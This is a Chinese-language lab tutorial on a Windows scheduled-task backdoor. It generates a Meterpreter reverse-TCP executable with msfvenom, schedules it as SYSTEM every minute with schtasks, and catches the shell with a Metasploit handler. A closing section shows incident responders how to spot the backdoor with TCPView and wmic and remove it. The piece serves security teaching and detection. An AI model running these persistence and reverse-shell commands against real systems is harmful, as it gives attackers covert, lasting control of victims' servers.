Windows留后门--教程（二）——Windows计划任务后门

一、Windows计划任务后门介绍

计划任务是经常被攻击者拿来利用的控制点，计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。

二、Windows计划任务后门-教程

前提条件: 假设在攻击的过程中通过利用各种getshell，已经拿到目标服务器administrator权限
靶机： windows Server2012
IP： 192.168.226.128
攻击机： kali
IP： 192.168.226.131

2.1 利用MSF生成一个EXE类型的后门木马

命令：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.131 lport=8888 -f exe -o wxiaoge.exe 
#lhost是我们的主机ip，lport是我们主机的用于监听的端口

2.2 创建计划任务

将生成的后门木马 wxiaoge.exe 上传到目标机内，然后在目标机内执行以下指令，创建一个wixoage计划任务，每一分钟执行一次wxiaoge.exe。

schtasks /create /tn wxiaoge /sc minute /mo 1 /tr C:\Users\Administrator\Desktop\wxiaoge.exe /ru system /f
#schtasks

查看计划任务成功创建，如下图所示：

2.3 监听返回的shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.226.131
set lport 8888
exploit

过一分钟之后接接收到靶机反弹回来的shell，权限维持成功

三、Windows计划任务后门——应急响应发现

3.1 使用TCPView查看网络连接

因为每一分钟或者几分钟定时任务才会执行一次，使用 netstat -ano命令查看的话，只会查看当前时间的网络连接状态，时间把握不准的话不一定可以查看到程序异常连接，因此使用TCPView

TCPView运行后可显示本机内存中执行的所有进程名、协议名称、本地地址+端口号、远程地址+端口号及它的状态，非常方便

在windows server 2012上打开TCPView，如下图所示，有一个红色的名字为wxiaoge.exe的进程，其远程地址是192.168.226.131:8888，PID是1468

通过PID号查找该进程文件所在的位置

wmic process get name,executablepath,processid|findstr 1468

找到文件位置在 C:\Users\Administrator\Desktop\wxiaoge.exe

之后将 wxiaoge.exe 异常程序使用微步云沙箱检测是后门木马

但是 TCPView 流量检测过程中，wxiaoge.exe程序一会儿红色一会儿绿色，像每个一分钟或者几分钟执行一次wxiaoge.exe程序，推测可能存在定时任务

3.2 查看定时任务

通过 管理工具-》任务计划程序 查看服务器的定时任务，发现有一个名字为 wxiaoge的定时任务，每隔一分钟执行一次C:\Users\Administrator\Desktop\wxiaoge.exe文件，其创建者是Administrator，说明攻击者已经获取超级管理员权限。

处置：

1、删除C:\Users\Administrator\Desktop\wxiaoge.exe文件

2、删除wxiaoge定时任务